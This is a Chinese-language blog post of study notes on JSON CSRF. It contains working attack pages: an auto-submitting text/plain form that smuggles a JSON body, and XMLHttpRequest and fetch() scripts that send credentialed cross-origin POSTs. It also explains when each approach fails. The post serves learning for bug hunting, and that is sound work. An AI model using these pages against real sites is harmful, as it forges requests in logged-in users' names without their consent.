zoukankan      html  css  js  c++  java

  • 碰到 Json_CSRF 怎么办?

    前言

    在最近挖洞的时候,老是碰到 POST 传参采用 JSON 格式,而不是传统的parameter=value的格式,之前也没接触过,所以也不知道该怎么搞,所以打算学习一下,此文作为一个笔记梳理。

    前提知识

    一般采用 Json 格式传输参数时,请求包中都有 Content-Type 头,一般服务器也会验证 Content-Type 值是否为 application/json,当服务器验证 Content-Type 时,若不符合要求,则会抛出异常,导致传输的数据失效

    当简单的采用表单传输简单参数时,Content-Type 值为:x-www-form-urlencoded,传输的数据会被 URL 编码,传输文件时值为:form-data
    给表单添加 enctype="text/plain" 属性时,Content-type 值为:text/plain

    在使用 XMLHttpRequest 跨域发起请求时,浏览器首先会先进行一次 OPTIONS 预请求,查看目标网站是否支持跨域,如果支持,则浏览器会进行下一步,发送真实请求,否则会直接报错

    突破限制的方法

    下面统一假设 POST 传输的参数为:{"title":"Json_CSRF","content":"xxxxxxx","time":"2020-07-20"}

    服务端不验证 Content-Type 的情况

    • 特殊的表单,即构造一个键值对
    <!DOCTYPE html>
<html>
<head>
	<title>Json_CSRF</title>
	<meta charset="utf-8">
</head>
<body>
<form id="test" enctype="text/plain" action="http://baidu.com" method="post">
	<input name='{"title":"Json_CSRF","content":"xxxxxxx","time":"2020-07-20","test":"' value='test"}'>
</form>
<script type="text/javascript">
	document.getElementById("test").submit();
</script>
</body>
</html>

    可以看到请求包中:

    传输的数据变成了:{"title":"Json_CSRF","content":"xxxxxxx","time":"2020-07-20","test":"=test"}
    且请求头中:Content-Type: text/plain,当服务器后端严格校验 Content-Type 头时,该方法也就差不多没用了

    • 利用 JS 中的 XMLHttpRequest,即 XHR,该方法要求目标网站支持跨域
    <!DOCTYPE html>
<html>
<head>
	<title>Json_CSRF</title>
	<meta charset="utf-8">
</head>
<body>
<script type="text/javascript">
	function csrf(){
	      var xmlhttp = new XMLHttpRequest();
	      xmlhttp.open("POST","https://baidu.com",true);
	      xmlhttp.setRequestHeader("Content-Type","application/json;charset=UTF-8");
	      xmlhttp.withCredentials = true;
	      xmlhttp.send(JSON.stringify({"title":"Json_CSRF","content":"xxxxxxx","time":"2020-07-20"}));;
	}
	csrf();
</script>
</body>
</html>

    首先,浏览器会发起一个 OPTION 请求,查询目标网站是否支持跨域

    如果目标响应包中有 Access-Control-Allow-Credentials: true 代表允许携带 cookie
    Access-Control-Allow-Origin:http://mysite.com 或者为 Access-Control-Allow-Origin:*,即代表支持跨域
    浏览器便会携带 cookie 发起真实请求

    注意:实际上百度并不支持跨域,此处只是为了方便演示

    当目标网站不支持跨域,则浏览器将不会发起请求,导致该方法失效

    当然,除了 XMLHttpRequestfetch 也是一样的

    <script>
      function csrf(){
            fetch('https://baidu.com';, {method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/json;charset=UTF-8'}, body: '{"title":"Json_CSRF","content":"xxxxxxx","time":"2020-07-20"}'});
      }
      csrf();
</script>

    服务端验证 Content-Type 的情况

    • XHR
      跟上面一样,也是利用 XMLHttpRequest
    • flash

    可惜,现在是个浏览器都会询问用户是否开启 flash,此举难以成功,而且不久,flash 就会被废弃
  • 相关阅读:
    搭建SSM框架之Spring
    手动编写第一个tomcat项目
    电信宽带运营支撑系统
    Java反射
    枚举
    类、枚举与接口
    (总结4)HTML5中如何自定义属性
    (总结3)HTML5中获取元素新增的dom方法以及类名操作
    (总结2)HTML5中新增加的音频/视频标签
    (总结1)HTML5中新增加的表单元素
  • 原文地址:https://www.cnblogs.com/wjrblogs/p/13339342.html
Copyright © 2011-2022 走看看